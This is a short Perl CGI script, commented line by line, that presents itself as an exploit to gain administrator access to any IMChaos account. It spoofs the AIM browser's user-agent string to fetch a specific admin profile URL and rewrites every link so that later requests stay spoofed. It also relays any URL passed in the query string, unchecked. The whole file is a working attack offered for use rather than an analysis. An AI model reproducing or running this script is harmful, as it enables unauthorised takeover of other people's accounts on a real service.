#!/usr/bin/perl
## IMChaos.cgi
## Exploit to gain admin access to any IMChaos account
## Spoofs the AIM Browser Window
## Written by: Stik
use HTTP::Request;
use LWP::UserAgent;
## Includes the above modules to be used in the script
print "Content-type: text/html\n\n";
## To output as an HTML Page, this is necessary
$agent = 'AIM/30 (Mozilla 1.24b; Windows; I; 32-bit)';
## UserAgent String of the AIM Window
$tmp = $ENV{'QUERY_STRING'};
## URL of the hyperlink clicked, blank if no hyperlink was clicked
if($tmp ne ""){
## The following keeps the browser spoofed when hyperlinks are clicked
$tmp =~ s/link=//g;
## Removes the word "link=" from the URL of the clicked hyperlink
$listurl1 = $tmp;
## URL of the clicked hyperlink
$ua = new LWP::UserAgent agent=>$agent, env_proxy=>1;
## Spoof the AIM Profile UserAgent as the UA of the current browser
$request = HTTP::Request->new(GET => "$listurl1");
$content = $ua->request($request)->content;
## Request the HTML of $listurl1, the clicked hyperlinked page
print "$content
";
## Display the page as it would be seen in the AIM window
} else {
## The Normal Spoofed page, before any hyperlinks are clicked
$listurl = 'http://dilutedweb.com/m.php?a=AdminScreenName&b=SETOFLETTERS';
## $listurl MUST be the hyperlink url with the profile holder's SN in place of yours
$ua = new LWP::UserAgent agent=>$agent, env_proxy=>1;
## Spoof the AIM Profile UserAgent as the UA of the current browser
$request = HTTP::Request->new(GET => "$listurl");
$content = $ua->request($request)->content;
## Request the HTML of $listurl, the Admin IMChaos Page
$content =~ s/\href=\"/href="IMChaos.cgi?link=/g;
## Replace all links with code to keep the browser spoofed as AIM
print "$content
";
## Display the page as it would be seen in the AIM window
}